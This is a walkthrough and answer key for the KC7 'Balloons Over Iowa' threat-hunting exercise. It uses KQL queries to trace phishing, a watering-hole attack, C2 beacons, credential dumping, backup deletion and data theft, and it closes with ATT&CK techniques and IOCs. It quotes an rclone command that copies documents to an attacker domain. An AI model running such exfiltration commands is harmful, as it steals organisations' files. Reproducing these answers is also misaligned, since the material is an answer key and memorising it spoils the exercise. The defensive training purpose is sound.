KC7 Guide - Balloons Over Iowa

Level 2: Intermediate

Continue to develop your pivoting and analysis skills. Learn about malware, watering hole, supply chain attacks, and more.

For the purpose of this guide, we’re going to skip over sections 1 & 5 which respectively serve as an introduction to kusto query language and cybersecurity trivia. Instead, we’ll go over sections 2-4 to focus on the investigation and incident(s).

Section 2: Aliens

• Q1. Which email address sent a message containing the domain invasion.xyz?

Email
| where link has "invasion.xyz"

• Q2. How many users received email with links to the domain invasion.xyz?

You can use the previous query to find the information. Looking at the results shows that only 2 users received emails to the identified link.

• Q3: What was the subject of the email sent in (1)?

Using that same query we can view the information needed to answer the question

• Q4: Who received the email in (1)? (Provide the email address of any of them)

We’re getting a lot of mileage out of that initial query. Using that we can find the necessary info.

• Q5: What file (name) was sent as a link in the email in (1)?

Still using that same query, we can focus in on the link section of the results to find the answer.

• Q6: What is the IP of the user who clicked on the link from the email containing the domain invasion.xyz?

Alright, so this requires a bit of a different approach. First we have to find the IP addresses assigned to the users that received the link to the file and store them in a variable, then use that variable as a parameter to search for network activity leading to that file.

Let the_ip = Employees
| where name has "peters" or name has "Lawrence"
| distinct ip_addr;
OutboundBrowsing
| where src_ip in (the_ip)
| where url has "Flight-Crew-Information.xls"

• Q7: What is the name of the user from (6)?

To find the name of the user, we kind of have to switch focus now. Use the IP address identified in the results from the previous query and check that against the Employees table.

Employees
| where ip_addr == "192.168.0.123"

• Q8: When did the the user in (6) click on the link? Provide an exact timestamp?

Using the employee information we’ve obtained from previous queries we can now check the network activity for the user to see when/if they clicked on the link.

OutboundBrowsing
| where src_ip == "192.168.0.123"
| where url contains "Flight-Crew-Information.xls"

• Q9: What is the hostname of the user in (6)

Search the Employees table for the identified user. You may have to scroll to view the results as that table contains a fair bit of info and has many columns.

Employees
| where ip_addr == "192.168.0.123"

• Q10: Did the user in (6) download the file on the link? (yes/no)

Lets look into the file history on the host that belongs to that user.

FileCreationEvents
| where hostname == "VRDA-MACHINE"
| where filename contains "flight"

No results means that the host device doesn’t have any files that contain “flight” in their name. So they must not have downloaded the file.

• Q11: How many total emails were sent by the email address in (1)?

Shifting focus back to the emails, lets zero in on the sender that originally sent the link to the file.

Email
| where sender == "tethys@pocketbook.xyz"
| count

We show a total of 9 emails that they sent to the organization.

• Q12. How many unique filenames were sent by email address in (1)?

Lets take a look at how many unique links the sender included in their emails and then we can narrow that down to unique filenames.

Email
| where sender == "tethys@pocketbook.xyz"
| distinct link

Thankfully it is pretty small amount of results so we can just spot check them instead of writing any additional queries or lines to narrow it down. We see 5 unique links with only 1 of the filenames appearing to be a duplicate. That gives us 4 separate files that were sent by this sender.

• Q13: What domain did the email address in (1) use to target Richard Clements?

Lets take a look at what link the sender included in an email to the user.

Email
| where sender == "tethys@pocketbook.xyz"
| where recipient contains "clements"
| project domain = parse_url(link).Host
| distinct tostring(domain);

• Q14: When did Richard Clements click on the link sent by the sender in (1)?

We know Richard has been targeted, so lets look at his network activity to see if he clicked on the link from the email.

let the_ip = Employees
| where name has "clements"
| distinct ip_addr;
OutboundBrowsing
| where src_ip in (the_ip) 
| where url has "antennas"

There is a result from query which means he visited the page that the link lead to.

• Q15: When did Richard Clements download the file in the link?

We know from the previous results that he visited the link, but lets check file events on his host device to see if the file was downloaded.

let host = Employees
| where name has "clements"
| distinct hostname;
FileCreationEvents
| where hostname in (host) 
| where filename has "flight"

Unfortunately our query returns a hit – the file exists on his device.

• Q16: What was the name of the file that Richard Clements downloaded (after clicking on the link?)

The previous query against the FileCreationEvents table shows the information in the results.

• Q17: What file was observed on Richard Clement’s machine immediately after he downloaded file in (16)? Provide the full path

So thanks to previous queries we know that the file exists. Lets copy the timestamp that the file was created and check the FileCreationEvents table for anything that happened at that time or later his host device.

FileCreationEvents
| where hostname == "HNOA-LAPTOP"
| where timestamp >= datetime(2023-03-04T07:50:39.76128Z)

The results show 72 file creation events. The first one shows when the original file was downloaded, but the very next entry shows up very after it’s creation. You may have to click on the `Path` column for that entry to view the entire file path.

• Q18: What was the Sha256 hash of the file in (17)?

The previous query also showcases the information that we’re after. You may need to click on the Sha256 column of the entry to view the entire hash value.

• Q19: The hash in (18) can be found on virustotal.com. Virustotal is a malware repository used by many security researchers. What is the reported name of this file on Virustotal?

Let’s copy the file hash and check it against VirusTotal. Use the website’s search function to paste the hash and view what information we get from the results.

• Q20: How many positive detections did the hash in (18) receive on VT?

The results from our search of the file hash on VirusTotal already show the number of positive dtections for the file.

• Q21: How many processes were spawned on Richard Clement’s machine by the file in (18)?

  ProcessEvents
  | where hostname == "HNOA-LAPTOP"
  | where parent_process_name contains "year"
  | count
  

The results show 2 processes that were spawned by that file.

• Q22: The file in (18) established a remote connection from Richard Clement’s machine to an external IP over port 443. What was this IP?

Lets remove the count parameter and take a look at what these processes are.

ProcessEvents
| where hostname == "HNOA-LAPTOP"
| where parent_process_name contains "year"

One of the entries in the results shows an IP address as part of the process commandline.

• Q23: Shortly after the malware ran, the attackers came back to Richard’s machine to enumerate Enterprise Admins. What command did they run?

We know that the threat actor enumerated enterprise admins so lets search that infected machine for any process commandlines that contain that phrase.

ProcessEvents
| where hostname == "HNOA-LAPTOP"
| where process_commandline contains "Enterprise Admins"

The results show the command that was run in the process_commandline column.

• Q24. What commands did the attacks run to dump credentials on Richard’s machine?

There are some pretty well known tools used to dump credentials, but instead of assuming which might be used, lets instead search the process for anything containing the string “pass” that could be short for password.

ProcessEvents
| where hostname == "HNOA-LAPTOP"
| where process_commandline contains "pass" 
| distinct process_commandline

Sure enough, a fan favorite credential stealer (mimikatz) shows up in the results along with the command used to dump the creds.

• Q25. The attackers enumerated the contents of this folder (name) on Richard’s machine and dumped the contents to a text file

Lets dig into the processes for that host. Assuming that it’s being run from the cmd prompt we can focus our search for anything on that device where the parent process is cmd.exe and contains references to the C: drive.

ProcessEvents
| where hostname == "HNOA-LAPTOP"
| where process_commandline contains "C:" and process_commandline has "dir"
| where process_name has "cmd"

One result is returned and if we click on the process commandline column for the entry we can view the directory that the threat actor was interested in.

• Q26. How many machines have similar commands connecting to C2 (command and control) channels as those observed in (22)?

In question 22, we found that an external connection was made over port 443. So with that knowledge we can try to find if any additional hosts have identical activity.

ProcessEvents
| where process_commandline contains "rundll32.exe" and process_commandline  contains ":443"
| distinct hostname
| count

The query returns a count of 36 different hosts that have similar activity on them.

• Q27. How many unique implants were used to establish these C2 connections?

We can adjust the previous query to focus on the parent processes instead of hosts.

ProcessEvents
| where process_commandline contains "rundll32.exe" and process_commandline contains ":443"
| distinct parent_process_hash
| count

This returns a resulting count of 11 different implants.

• Q28. One of these C2 connections was observed on hostname 0KYU-DESKTOP. When did this occur?

Honing in on a specified device, we can modify the previous query to discover when the activity took place.

ProcessEvents
| where process_commandline contains "rundll32.exe" and process_commandline contains ":443"
| where hostname == "0KYU-DESKTOP"

• Q29: On hostname 0KYU-DESKTOP, attackers ran this command to delete data backups

Lets look at the specific host and check the process history for anything that contains the string ‘del’ as a shortened version of ‘delete’.

ProcessEvents
| where hostname == "0KYU-DESKTOP"
| where process_commandline contains "del"

For our investigation, this is the smoking gun of evidence. WMIC is a utility for performing Windows management activities. Deleting the shadowcopies means that backups and snapshots have been wiped from existence.

• Q30: It is likely that the observed actor (the one responsible for activity seen in 29) conducted this type of destructive attack

Based on the activity seen in question 29, we can assume that the threat actor is intending to deploy ransomware. With no backups to restore from, a victim is facing the prospect of entirely rebuilding their infrastructure or complying with the ransom demands. In a financially motivated attack, the threat actor just tipped the odds in their favor a bit more.

Section 3: Top Secret

• Q1: On 2023-02-19 at 05:02, Son Johnson downloaded a suspicious Word document file. What was the name of this file?

  let son_host = Employees
  | where name has "Son"
  | distinct hostname;
  FileCreationEvents
  | where hostname in (son_host)
  | where timestamp >= datetime(2023-02-19T05:02)
  | where filename contains ".doc"
  

  

Although our query shows 3 different files in the results, only 1 meets the requirement of matching the date and time stipulated by the question.

• Q2: From which domain did Son Johnson download the file identified in (1)?

The suspicious file was in Son’s Download’s directory so let’s find out how it got there by looking at Son’s network activity for the suspicious file.

let son_ip = Employees
| where name has "Son"
| distinct ip_addr;
OutboundBrowsing
| where src_ip in (son_ip)
| where url has "Flight-Crew-Information.docx"

• Q3: What IP address does the domain identified in (2) resolve to?

  PassiveDns
  | where domain == "espionage.com"
  

  

• Q4: What time was the resolution seen in (3) recorded in Passive DNS data? (enter exact timestamp)

The previous query can be used to find the information needed.

• Q5: What other Top Level Domain (TLD) such as .com, .org etc. is used by the domains hosted on the IP identified in (3)?

  PassiveDns
  | where ip == "131.102.77.156"
  

  

Thankfully only 3 additional domains appear to be hosted on that address. Half of them use ".com" for their top level domain, while the other half uses ".air".

• Q6: How many domains resolve to the IP identified in (3)?

The previous query already revealed there to be a total of 4 domains hosted on that IP address.

• Q7: One of the domains identified in (6) resolves to an IP that starts with 194. What is this IP?

  let domains = PassiveDns
  | where ip == "131.102.77.156"
  | distinct domain;
  PassiveDns
  | where domain in (domains)
  | where tostring(ip) startswith "194"
  

  

• Q8: The attackers performed reconnaissance against our organization using the IP identified in (7). As part of this reconnaissance, the attackers searched for a three-word phrase. What was this phrase?

Time to switch gears and take a look at inbound network activity. Lets use the IP address we just identified as the source address and focus on what they might be searching for.

InboundBrowsing
| where src_ip == "194.235.79.0"
| where url has "search"
| distinct url

We get only 3 results from the query we ran. And only one matches the 3 word phrase stipulated from the question.

• Q9: Just before downloading the file identified in (1), Son Johnson browsed to a domain. What was this domain?

We can modify one of our earlier queries to zero in on the time frame to just before the suspicious file was downloaded.

let son_ip = Employees
| where name has "Son"
| distinct ip_addr;
OutboundBrowsing
| where src_ip in (son_ip)
| where timestamp <= datetime(2023-02-19T05:02:57.22982Z)

The first entry in the results matches the timestamp we supplied in the query and shows that initial file download. But right before that we see that Son was redirected to that page from another domain.

• Q10: What kind of attack was Son Johnson a victim of?

Redirects can often lead to drive-by-downloads. But as this domain was related to aviation, the targeted organization’s industry, we can assume that this is a watering hole attack meant to infect those that frequented the page.

• Q11: How many different domains did the attackers use in this kind of attack? (The attack type identified in [10])

Based on previous activity we know that a redirect was used from the blimpgoespop domain. Lets check network activity for anything similar and see if any additional domains appear as a result.

OutboundBrowsing
| where url contains "blimpgoespop.com?redirect"
| distinct url

Our hunch was right – 38 total domains get redirected from there.

• Q12: How many employees at Balloons Over Iowa were victims of this kind of attack? (The attack type identified in [10])

Let’s modify the previous query to focus on source IP addresses instead of unique domains. This will show us how many employees were affected by the same type of attack.

OutboundBrowsing
| where url contains "blimpgoespop.com?redirect"
| distinct src_ip
| count

This query nets us 58 results.

• Q13: How many different employee roles did the attackers target using this type of attack? (The attack type identified in [10])

Continuing the trend of modifying the previous query, lets use those results to narrow down what role at the organization was targeted.

let victims = OutboundBrowsing
| where url contains "blimpgoespop.com?redirect"
| distinct src_ip;
Employees
| where ip_addr in (victims)
| distinct role

Only two company roles were targeted: balloon pilot and balloon operations analyst.

• Q14: You have received an alert that this employees’ device, - hostname 3CIU-LAPTOP - may have malware on it involving this hash: 4c199019661ef7ef79023e2c960617ec9a2f275ad578b1b1a027adb201c165f3 that was the parent of suspicious processes. What is the name of the file?

  ProcessEvents
  | where hostname == "3CIU-LAPTOP"
  | where parent_process_hash == "4c199019661ef7ef79023e2c960617ec9a2f275ad578b1b1a027adb201c165f3"
  

  

• Q15: What is the username associated with the device found in 14?

Lets see what user is assigned to the host that triggered the prior alert.

Employees
| where hostname == "3CIU-LAPTOP"
| project name, username, ip_addr, email_addr

• Q16: What is the role of (15) in the organization?

Modifying the previous query, shows us that the user is assigned the Balloon Pilot role.

Employees
| where hostname == "3CIU-LAPTOP"
| distinct role

• Q17: You observe that this the file (from 14) is launching a process on 3CIU-LAPTOP named rundll32.exe with an external IP address. What is that IP address?

  ProcessEvents
  | where hostname == "3CIU-LAPTOP"
  | where process_commandline contains "rundll32.exe" and process_commandline contains ":"
  | distinct process_commandline
  

  

The query returns 2 results, but only one showcases an IP address: 172.181.104.77:443.

• Q18: What does this connection (from 17) indicate? (one of the phases of the kill chain)

Looking at the results from the previous query, it shows that we’re looking at C2 activity – command and control.

• Q19: Investigating compromised devices in the org you find malicious activity using a tool called rclone. What domain is listed in its command line on Julie Well’s device?

  ProcessEvents
  | where hostname == "3CIU-LAPTOP"
  | where process_commandline has "rclone"
  

  

You may need to click on the process commandline column to view the entire string, but "infiltrate.air" is listed there.

• Q20: What IP address does (19) resolve to?

  PassiveDns
  | where domain == "infiltrate.air"
  

  

• Q21: How many total domains have also resolved to this IP (the one found in 20)?

Change the previous query to search for IP addresses instead of domains and we will find if any other domains share that address.

PassiveDns
| where ip == "131.102.77.156"

• Q22: What does the command found in (19) represent? (Hint: It’s a MITRE ATT&CK Tactic)

  rclone.exe copy --transfers12 "*docx" "*xls" "*pdf" "*zip" infiltrate.air
  

The command shows that a data transfer of specified file types is occurring. This coincides with the ATT&CK tactic – exfiltration.

• Q23: How many other devices on the org had similar threat activity using rclone on them?

  ProcessEvents
  | where process_commandline has "rclone"
  | distinct hostname
  |count
  

We get a total of 14 host devices with similar rclone activity on them.

• Q24: The attackers disabled Defender (antivirus) on some devices in the network. How many systems did they do this on?

Powershell, a Windows CLI utility, can be used to disable the native antivirus with a simple command. Lets check to see if we find any instances of that being run and, if so, how many times it occurred.

ProcessEvents
| where process_commandline contains "disablerealtimemonitoring"
| distinct hostname
| count

Unfortunately, we see this activity happen on 16 total hosts.

• Q25: A member of your investigation team reported that host GWB7-DESKTOP was compromised. What is the timestamp of the earliest suspicious process event you observe on this device? (Paste full timestamp)

If you attempt to manually look at the process events for the host, you’ll end up with having to manually go through 600+ entries. That’s too much data and requires too much time to parse. We can attempt to narrow down our results by looking for the `Sha256` hash of the malicious file we found earlier.

ProcessEvents
| where hostname == "GWB7-DESKTOP"
| where parent_process_hash == "ebff4951be5e2481866fc61806b6bf8ebad297f09632a9c067bcdcec6d203521"

Much better – only 2 results and we only want the earliest time that we observed on this device.

• Q26: What is the command and control (C2) IP address observed on GWB7-DESKTOP

We’ve seen previous command and control activity performed against the organization over port 443. Lets use the information we’ve learned earlier to check against the host.

ProcessEvents
| where hostname == "GWB7-DESKTOP"
| where process_commandline contains "rundll32.exe" and process_commandline contains ":443"

• Q27: What is the timestamp of the earliest Passive DNS resolution seen on the IP found in (26)?

  PassiveDns
  | where ip == "179.175.35.248"
  

  

• Q28: Which of the domains hosted on the IP found in (26) resolve to the most number of unique IPs? If there is a tie, enter any one of the domains.

  let domains = PassiveDns
  | where ip == "179.175.35.248"
  | distinct domain;
  PassiveDns
  | where domain in (domains)
  

  

"Covert.com" and "deference.com" both only appear on one address. But "deference.air" and "pheasants-infiltrate.com" both have two addresses.

• Q29: What is the domain using the “.air” TLD that resolves to the IP found in (26)?

  PassiveDns
  | where ip == "179.175.35.248"
  | where domain endswith ".air"
  

  

• Q30: The domain found in (29) resolves to an IP that starts with “144.” What is the hostname on which this IP was used for command and control?

First lets take a look at what IP addresses the domain "deference.air" resolves to.

PassiveDns
| where domain == "deference.air"

Now we have the full IP address, lets check the environment to see if/where it appears.

ProcessEvents
| where process_commandline contains "144.158.189.112"
| distinct hostname

And a single result appears, showing the activity on "RQSO-DESKTOP".

Section 4: Helpdesk

• Q1: How many emails contained the domain “database.io”?

  Email
  | where link has "database.io"
  

  

Only 1 email contains a link to that domain.

• Q2: What IP does the domain “database.io” resolve to

  PassiveDns
  | where domain has "database.io"
  

  

• Q3: How many domains resolve to the same Ip as “database.io”?

  PassiveDns
  | where ip == "176.167.219.168"
  | distinct domain
  

  

It turns out that a total of 8 domains share that IP address.

• Q4: How many emails contained domains sharing the same IP as “database.io”?

Lets save the results from the previous query as a variable to search for any instances in the email records.

let domains = PassiveDns
| where ip == "176.167.219.168"
| distinct domain;
Email
| where link has_any (domains)
| count

We get a count of 9 emails that reference the domains found as a result of running the query for the previous question.

• Q5: What was the most prevalent sender of emails seen in (4)?

Lets modify the previous query to focus on the senders of the emails.

let domains = PassiveDns
| where ip == "176.167.219.168"
| distinct domain;
Email
| where link has_any (domains)
| summarize count() by sender

One sender (SSL@hotmail.com) sent 2/3 of all the emails that contained links to the previously identified domains.

• Q6: How many total emails were sent by the sender in (5)?

  Email
  | where sender == SSL@hotmail.com
  | count
  

This reveals to us that the organization received 15 emails from that specific sender.

• Q7: What was the most prevalent email subject used by the sender in (5)?

  Email
  | where sender == "SSL@hotmail.com"
  | summarize count() by subject
  

It’s a dirty trick disguising a message as a security alert, but the results show that tactic is used most commonly in the emails sent by the threat actor.

• Q8: Which user named Carolyn clicked on a link containing the domain “hardware.com”? (Provide full name)

  let findme = OutboundBrowsing
  | where url has "hardware.com"
  | distinct src_ip;
  Employees
  | where ip_addr in (findme)
  | where name has "Carolyn"
  

Our query parameters are very specific and efficient at narrowing down the potential Carolyns.

• Q9: What attacker IP was used to login to Carolyn’s account after she clicked the link?

Make note of the username in the results from the previous query and lets check the `AuthenticationEvents` table.

AuthenticationEvents
| where username == "caschaeffer"
| distinct src_ip

The external IP address should immediately stand out.

• Q10: How many accounts did the attacker try to log into (successfully or unsuccessfully) from the IP in (9)?

  AuthenticationEvents
  | where src_ip == "['171.250.201.103']"
  | distinct username
  | count
  

The query returns a count of 4 distinct accounts the threat actor attempted to log into from that address.

• Q11: What filename did the attackers use to exfiltrate data from Carolyn’s email? (Hint: Look at the parameters in the URL)

  InboundBrowsing
  | where src_ip == "['171.250.201.103']"
  | where url contains "caschaeffer"
  

  

You may need to click on the entry in the URL column to view the entire contents. But if you look at the text string you can see the name of the file at the end.

• Q12: When did the attackers exfiltrate data from Carolyn’s email? (exact timestamp)

The results from the previous query show the data exfiltration occurring at 2023-02-11T13:34:31.291779Z

• Q13: What IP does the domain ‘hardware.com’ resolve to?

  PassiveDns
  | where domain has "hardware.com"
  | distinct ip
  

We only get 1 hit when looking up potential IP addresses for hardware.com - 53.85.224.235.

• Q14: This IP (from question 13) is used to find out information about the company. What is the first URL the attackers browsed to from this IP?

  InboundBrowsing
  | where src_ip == "53.85.224.235"
  

  

If you look at the first entry of the results, it shows the earliest time any activity was seen from that address.

• Q15: What is this type of research technique (from 14) called?

Performing searches for information against a target is considered reconnaissance.

Threat Actor(s)

Summary

The Balloons Over Iowa organization became the target for one or more threat actors. The time frame of the attacks, methods used, and their differing motivations suggests that there was likely more than one group that targeted the organization. One financially motivated actor infiltrated the network and deleted backups in preparation for a potential ransomware deployment while others focused on theft of intellectual property, the execution of a watering hole attack, and exfiltration of company trade secrets.

Initial Access Vector

• Discovery: T1201 Password Policy Discovery
• Initial Access: T1566.002 Phishing - Spearphishing Link

Post Exploitation Activity

• Collection: T1114.002 Remote Email Collection
• Credential Access: T1003 OS Credential Dumping

Exfiltration and Impact

• Exfiltration: T1041 Exfiltration Over C2 Channel
• Impact: T1490 Inhibit System Recovery

Indicators of Compromise:

Files

• blimp.exe
  • ebff4951be5e2481866fc61806b6bf8ebad297f09632a9c067bcdcec6d203521
  • 4c199019661ef7ef79023e2c960617ec9a2f275ad578b1b1a027adb201c165f3
  • 261e6dc6c25734ddaba007bedb8b474d7be4803d8e724d42637775bd7cc397aa
  • 163873b0e6ce8a9c54df33ed4f8fdee198bd7c6f584a425b7c6ba8830ddfbe42
  • dd053f38f5e60cd8750df450a13833c96d1285e78480323a54abab4a536f6317
  • 3666cb55d0c4974bfee855ba43d596fc6d10baff5eb45ac8b6432a7d604cb8e9
  • ba8a996a117702b946e07dd12d030956efddc159a5e775c18b1a7fb10df13902
  • 370ce39ba328329ff16b5ede1079f6402e68abceb34e65cb31883a3b3730b530
• helium.exe
  • 3b90ed2209f412de68c3043443ce6f474ea9e54db437ba2372101fa04ffb7d2e
  • dd053f38f5e60cd8750df450a13833c96d1285e78480323a54abab4a536f6317
  • 4c199019661ef7ef79023e2c960617ec9a2f275ad578b1b1a027adb201c165f3
  • ebff4951be5e2481866fc61806b6bf8ebad297f09632a9c067bcdcec6d203521
  • 3666cb55d0c4974bfee855ba43d596fc6d10baff5eb45ac8b6432a7d604cb8e9
  • 163873b0e6ce8a9c54df33ed4f8fdee198bd7c6f584a425b7c6ba8830ddfbe42
  • 370ce39ba328329ff16b5ede1079f6402e68abceb34e65cb31883a3b3730b530
  • 6ef6c499ef61e6ebd8607ae4d5205931b423d1832671e81c3924f8e4a4879fab
• yeargood.exe
  • 163873b0e6ce8a9c54df33ed4f8fdee198bd7c6f584a425b7c6ba8830ddfbe42
  • ebff4951be5e2481866fc61806b6bf8ebad297f09632a9c067bcdcec6d203521
  • dd053f38f5e60cd8750df450a13833c96d1285e78480323a54abab4a536f6317
  • 98b69ee7028539fe59447b0b919aa2b85be15cec8f1a131c9019ee3ffbd4713b
  • 3666cb55d0c4974bfee855ba43d596fc6d10baff5eb45ac8b6432a7d604cb8e9
  • ba8a996a117702b946e07dd12d030956efddc159a5e775c18b1a7fb10df13902
  • 3b90ed2209f412de68c3043443ce6f474ea9e54db437ba2372101fa04ffb7d2e

Tools

• Rclone
• Mimikatz

Addresses

• 118[.]3[.]14[.]33
• 172[.]181[.]104[.]77
• 179[.]175[.]35[.]248
• 171[.]250[.]201[.]103
• 53[.]85[.]224[.]235

Domains

• covert.com
• deference.air
• deference.com
• espionage.com
• infiltrate.air
• pheasants-infiltrate.com
• surveil-covert.com
• surveil.air